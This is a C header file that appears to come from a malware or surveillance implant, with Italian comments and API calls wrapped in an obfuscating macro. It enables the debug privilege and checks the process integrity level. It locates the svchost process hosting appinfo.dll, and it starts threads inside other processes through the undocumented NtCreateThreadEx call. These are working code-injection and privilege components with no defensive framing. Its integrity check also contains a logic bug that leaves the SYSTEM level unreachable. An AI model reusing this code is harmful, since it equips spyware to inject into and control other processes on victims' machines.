HM_VistaSpecific.h
void SetDebugPrivilege(BOOL to_set)
{
HANDLE hProc = 0, hProcToken = 0;
TOKEN_PRIVILEGES tp;
LUID luid;
do {
if (! (hProc = FNC(OpenProcess)(PROCESS_ALL_ACCESS, true, FNC(GetCurrentProcessId)())))
break;
if( !FNC(OpenProcessToken)(hProc, TOKEN_ALL_ACCESS, &hProcToken) )
break;
if (!FNC(LookupPrivilegeValueA) (NULL, SE_DEBUG_NAME, &luid))
break;
ZeroMemory (&tp, sizeof (tp));
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (to_set)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
FNC(AdjustTokenPrivileges) (hProcToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
} while (FALSE);
if (hProcToken)
CloseHandle (hProcToken);
if (hProc)
CloseHandle(hProc);
}
#define IL_UNKNOWN 0
#define IL_LOW 1
#define IL_MEDIUM 2
#define IL_HIGH 3
#define IL_SYSTEM 4
#define SECURITY_MANDATORY_UNTRUSTED_RID (0x00000000L)
#define SECURITY_MANDATORY_LOW_RID (0x00001000L)
#define SECURITY_MANDATORY_MEDIUM_RID (0x00002000L)
#define SECURITY_MANDATORY_SYSTEM_RID (0x00004000L)
#define SECURITY_MANDATORY_PROTECTED_PROCESS_RID (0x00005000L)
#define SECURITY_MANDATORY_HIGH_RID (0x00003000L)
/*typedef struct _TOKEN_MANDATORY_LABEL {
SID_AND_ATTRIBUTES Label;
} TOKEN_MANDATORY_LABEL, *PTOKEN_MANDATORY_LABEL;*/
BOOL IsVista(DWORD *integrity_level)
{
HANDLE hProc = 0, hProcToken = 0;
BOOL is_vista = FALSE;
PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel;
DWORD dwLengthNeeded;
if (integrity_level)
*integrity_level = IL_UNKNOWN;
do {
if (! (hProc = FNC(OpenProcess)(PROCESS_ALL_ACCESS, true, FNC(GetCurrentProcessId)())))
break;
if( !FNC(OpenProcessToken)(hProc, TOKEN_ALL_ACCESS, &hProcToken) )
break;
if ( !FNC(GetTokenInformation)(hProcToken, (TOKEN_INFORMATION_CLASS) 25, NULL, 0, &dwLengthNeeded) ) {
if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
pTIL = (PTOKEN_MANDATORY_LABEL) LocalAlloc(0, dwLengthNeeded);
if (pTIL != NULL) {
if ( FNC(GetTokenInformation)(hProcToken, (TOKEN_INFORMATION_CLASS)25, pTIL, dwLengthNeeded, &dwLengthNeeded) ) {
// Se la FNC(GetTokenInformation) torna OK allora siamo su vista
is_vista = TRUE;
dwIntegrityLevel = *FNC(GetSidSubAuthority)(pTIL->Label.Sid, (DWORD)(UCHAR)(*FNC(GetSidSubAuthorityCount)(pTIL->Label.Sid)-1));
if (integrity_level) {
if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
*integrity_level = IL_LOW;
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
*integrity_level = IL_MEDIUM;
else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
*integrity_level = IL_HIGH;
else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
*integrity_level = IL_SYSTEM;
}
}
LocalFree(pTIL);
}
}
}
} while (FALSE);
if (hProcToken)
CloseHandle (hProcToken);
if (hProc)
CloseHandle(hProc);
return is_vista;
}
DWORD FindRunAsService()
{
HANDLE hProcessSnap;
HANDLE hModuleSnap;
PROCESSENTRY32 pe32;
MODULEENTRY32 me32;
DWORD service_pid = 0;
pe32.dwSize = sizeof( PROCESSENTRY32 );
if ( (hProcessSnap = FNC(CreateToolhelp32Snapshot)( TH32CS_SNAPPROCESS, 0 )) == INVALID_HANDLE_VALUE )
return 0;
if( !FNC(Process32First)( hProcessSnap, &pe32 ) ) {
CloseHandle( hProcessSnap );
return 0;
}
// Cicla la lista dei processi attivi
do {
// Vede se e' un svchost
if (stricmp("svchost.exe", pe32.szExeFile))
continue;
if ( (hModuleSnap = FNC(CreateToolhelp32Snapshot)( TH32CS_SNAPMODULE, pe32.th32ProcessID )) == INVALID_HANDLE_VALUE )
continue;
// Vede se ha il modulo appinfo.dll
me32.dwSize = sizeof(MODULEENTRY32);
if ( FNC(Module32First)(hModuleSnap, &me32) ) {
do {
if (!stricmp("appinfo.dll", me32.szModule)) {
service_pid = pe32.th32ProcessID;
break;
}
} while(FNC(Module32Next)(hModuleSnap, &me32));
}
CloseHandle( hModuleSnap );
// Quando l'ha trovato finisce
if (service_pid)
break;
} while( FNC(Process32Next)( hProcessSnap, &pe32 ) );
CloseHandle( hProcessSnap );
return service_pid;
}
typedef struct {
ULONG Length;
ULONG Unknown1;
ULONG Unknown2;
PULONG Unknown3;
ULONG Unknown4;
ULONG Unknown5;
ULONG Unknown6;
PULONG Unknown7;
ULONG Unknown8;
} UnkVistaTh;
typedef DWORD (WINAPI *NtCreateThreadEx_t) (PHANDLE, ACCESS_MASK, DWORD, HANDLE, LPTHREAD_START_ROUTINE, LPVOID, BOOL, DWORD, DWORD, DWORD, LPVOID);
HANDLE VistaCreateRemoteThread(HANDLE hProcess, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter)
{
HANDLE hRemoteThread = NULL;
NtCreateThreadEx_t pNtCreateThreadEx;
UnkVistaTh thread_desc;
DWORD dw0 = 0;
DWORD dw1 = 0;
pNtCreateThreadEx = (NtCreateThreadEx_t) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtCreateThreadEx" );
if (!pNtCreateThreadEx)
return NULL;
ZeroMemory(&thread_desc, sizeof(thread_desc));
thread_desc.Length = 36;
thread_desc.Unknown1 = 0x10003;
thread_desc.Unknown2 = 0x8;
thread_desc.Unknown3 = &dw0;
thread_desc.Unknown4 = 0;
thread_desc.Unknown5 = 0x10004;
thread_desc.Unknown6 = 4;
thread_desc.Unknown7 = &dw1;
thread_desc.Unknown8 = 0;
pNtCreateThreadEx (&hRemoteThread, 0x1FFFFF, NULL, hProcess, lpStartAddress,
lpParameter, FALSE, NULL, NULL, NULL, &thread_desc);
return hRemoteThread;
}